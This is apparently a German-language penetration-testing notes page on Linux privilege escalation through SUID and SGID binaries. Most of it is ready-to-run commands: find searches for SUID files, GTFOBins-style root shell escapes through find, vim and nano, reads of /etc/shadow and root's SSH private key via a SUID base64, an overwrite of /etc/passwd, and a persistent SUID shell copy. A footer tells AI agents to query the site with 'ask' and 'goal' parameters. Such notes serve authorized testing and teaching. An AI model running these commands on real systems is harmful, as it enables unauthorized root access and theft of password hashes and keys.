> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/de/privesc/suid.md).

# SUID

SUID-Binärdateien werden mit den Rechten ihres Eigentümers ausgeführt, oft root. Eine verwundbare, veraltete oder zu flexible SUID-Binärdatei kann geschützte Dateien lesen, eine privilegierte Shell starten oder vom Angreifer kontrollierten Code ausführen.

## Methodik

* Liste SUID-Binärdateien auf und vergleiche ungewöhnliche Einträge mit GTFOBins.
* Priorisiere benutzerdefinierte Binärdateien, alte Versionen, beschreibbare Abhängigkeiten und Binärdateien außerhalb der standardmäßigen Systempfade.
* Teste Lese-, Schreib-, Befehlsausführungs- und Bibliothekslade-Primitiven, bevor du destruktive Payloads ausführst.

## Schnellprüfungen

```bash
find / -perm -4000 -type f 2>/dev/null
find / -type f -perm -4000 -ls 2>/dev/null
find / -type f -perm -2000 -ls 2>/dev/null
find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2>/dev/null
```

## SUID- und SGID-Triage

SUID führt die Binärdatei mit den Rechten des Dateieigentümers aus, während SGID sie mit den Rechten der Dateigruppe ausführt. Vergleiche nach der Auflistung ungewöhnliche Binärdateien mit [GTFOBins](https://gtfobins.github.io/) und priorisiere benutzerdefinierte Pfade, beschreibbare Verzeichnisse und Binärdateien im Besitz von root.

Nützliche Schnellprüfungen:

```bash
find / -type f -perm -4000 -ls 2>/dev/null
find / -type f -perm -2000 -ls 2>/dev/null
find / -type f \( -perm -4000 -o -perm -2000 \) -exec ls -la {} \; 2>/dev/null
```

Gängige GTFOBins-artige Beispiele:

```bash
find . -exec /bin/sh -p \; -quit
```

Für `nano`, verwende `Ctrl+R`, dann `Ctrl+X`, dann führe aus:

```
reset; sh 1>&0 2>&0
```

Für `vim`:

```bash
vim -c ':shell'
vim -c ':!/bin/sh'
```

Wenn ein SUID-/privilegierter Kopier-Workflow sensible Dateien überschreiben kann, validiere das Schreibprimitive sorgfältig, bevor du Produktionsdateien anfasst:

```bash
cp /tmp/malicious_passwd /etc/passwd
```

Wenn `base64` Wenn es SUID ist, verwende es eher als Leseprimitive statt als Shell-Primitive:

```bash
ls -la /usr/bin/base64
/usr/bin/base64 /etc/shadow | base64 --decode
/usr/bin/base64 /root/.ssh/id_rsa | base64 --decode
/usr/bin/base64 /var/log/auth.log | base64 --decode
```

Wenn `cp` Wenn es SUID ist, prüfe, ob es eine privilegierte Kopie erstellen oder beibehalten kann:

```bash
cp /bin/sh /tmp/sh
chmod +s /tmp/sh
/tmp/sh -p
```

Häufige SUID-/SGID-Binärdateien, die es sich zu prüfen lohnt:

| Binärdatei                                            | Warum prüfen                                                              |
| ----------------------------------------------------- | ------------------------------------------------------------------------- |
| `sudo` / `su`                                         | Direkte Werkzeuge an der Privilegiengrenze.                               |
| `passwd`, `chsh`, `newgrp`, `gpasswd`                 | Hilfsprogramme zur Änderung von Konten und Gruppen.                       |
| `at`                                                  | Zeitgesteuerte Befehlsausführung.                                         |
| `mount`, `umount`                                     | Dateisystemzugriff und Einhängeoptionen.                                  |
| `pkexec`                                              | Polkit-Hilfsprogramm, historisch von PwnKit betroffen.                    |
| `base64`                                              | Geschützte Dateien lesen und lokal dekodieren.                            |
| `cp`                                                  | Dateien kopieren oder überschreiben, wenn die Berechtigungen es erlauben. |
| `find`, `nano`, `vim`, `less`, `more`, `bash`, `dash` | Shell-, Lese- oder Dateischreib-Primitiven im GTFOBins-Stil.              |
| `nmap`                                                | Veralteter interaktiver Modus oder Pfade zur Skriptausführung.            |

<table data-view="cards" data-full-width="false" data-search="false"><thead><tr><th></th><th></th><th></th><th data-hidden data-card-target data-type="content-ref"></th></tr></thead><tbody><tr><td><h3><i class="fa-id-card" style="color:$primary;">:id-card:</i></h3></td><td><h4>SUID pkexec / PwnKit</h4></td><td>Hinweise zu SUID (Pkexec) für Linux-Privilegieneskalation, mit Aufzählungsschritten, Ausnutzungsbeispielen und auf Berichterstattung ausgerichteter Validierung.</td><td><a href="/pages/26537a018a0b051c54e29de3f93c8b3056228064">/pages/26537a018a0b051c54e29de3f93c8b3056228064</a></td></tr><tr><td><h3><i class="fa-id-card" style="color:$primary;">:id-card:</i></h3></td><td><h4>SUID Base64</h4></td><td>Hinweise zu SUID (Base64) für Linux-Privilegieneskalation, mit Aufzählungsschritten, Ausnutzungsbeispielen und auf Berichterstattung ausgerichteter Validierung.</td><td><a href="/pages/1a0d0d57cf672c8e0ca2f29bd4046bfa8a9f12ea">/pages/1a0d0d57cf672c8e0ca2f29bd4046bfa8a9f12ea</a></td></tr><tr><td><h3><i class="fa-id-card" style="color:$primary;">:id-card:</i></h3></td><td><h4>SUID PHP</h4></td><td>Hinweise zu SUID (PHP) für Linux-Privilegieneskalation, mit Aufzählungsschritten, Ausnutzungsbeispielen und auf Berichterstattung ausgerichteter Validierung.</td><td><a href="/pages/a62077303106cb8a99813a7403c316f990456613">/pages/a62077303106cb8a99813a7403c316f990456613</a></td></tr><tr><td><h3><i class="fa-id-card" style="color:$primary;">:id-card:</i></h3></td><td><h4>SUID Core Dump /opt/count</h4></td><td>Hinweise zu SUID - Speicherdump (/opt/count) für Linux-Privilegieneskalation, mit Aufzählungsschritten, Ausnutzungsbeispielen und auf Berichterstattung ausgerichteter Validierung.</td><td><a href="/pages/8ff04f86a1f9095c77bfc454a61ae239cfb8605e">/pages/8ff04f86a1f9095c77bfc454a61ae239cfb8605e</a></td></tr><tr><td><h3><i class="fa-id-card" style="color:$primary;">:id-card:</i></h3></td><td><h4>SUID Fehlende Datei</h4></td><td>Hinweise zu SUID-Binärdatei (Fehlende Datei) für Linux-Privilegieneskalation, mit Aufzählungsschritten, Ausnutzungsbeispielen und auf Berichterstattung ausgerichteter Validierung.</td><td><a href="/pages/e50d1e257d5d27139c5fe6b328fad9676cb5e1cb">/pages/e50d1e257d5d27139c5fe6b328fad9676cb5e1cb</a></td></tr><tr><td><h3><i class="fa-id-card" style="color:$primary;">:id-card:</i></h3></td><td><h4>SUID screen</h4></td><td>Hinweise zu SUID (screen) für Linux-Privilegieneskalation, mit Aufzählungsschritten, Ausnutzungsbeispielen und auf Berichterstattung ausgerichteter Validierung.</td><td><a href="/pages/e8dee740f95cb56ef8923e7dbcb165bd3b92d14c">/pages/e8dee740f95cb56ef8923e7dbcb165bd3b92d14c</a></td></tr><tr><td><h3><i class="fa-id-card" style="color:$primary;">:id-card:</i></h3></td><td><h4>SUID Nmap</h4></td><td>Hinweise zu SUID (Nmap) für Linux-Privilegieneskalation, mit Aufzählungsschritten, Ausnutzungsbeispielen und auf Berichterstattung ausgerichteter Validierung.</td><td><a href="/pages/be7f53ab450fd515e8fde3de336d6f470cf9cd3c">/pages/be7f53ab450fd515e8fde3de336d6f470cf9cd3c</a></td></tr><tr><td><h3><i class="fa-id-card" style="color:$primary;">:id-card:</i></h3></td><td><h4>SUID-Backup-Binärdatei</h4></td><td>Hinweise zu SUID-Binärdatei (Backup) für Linux-Privilegieneskalation, mit Aufzählungsschritten, Ausnutzungsbeispielen und auf Berichterstattung ausgerichteter Validierung.</td><td><a href="/pages/753fda9db1acc51914e884ce635863b95e3561a5">/pages/753fda9db1acc51914e884ce635863b95e3561a5</a></td></tr><tr><td><h3><i class="fa-id-card" style="color:$primary;">:id-card:</i></h3></td><td><h4>SUID Enlightenment</h4></td><td>Hinweise zu SUID (Enlightenment) für Linux-Privilegieneskalation, mit Aufzählungsschritten, Ausnutzungsbeispielen und auf Berichterstattung ausgerichteter Validierung.</td><td><a href="/pages/9e9e2a0f8f459b1c4acd6d07e651ec2ea859a269">/pages/9e9e2a0f8f459b1c4acd6d07e651ec2ea859a269</a></td></tr></tbody></table>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/de/privesc/suid.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
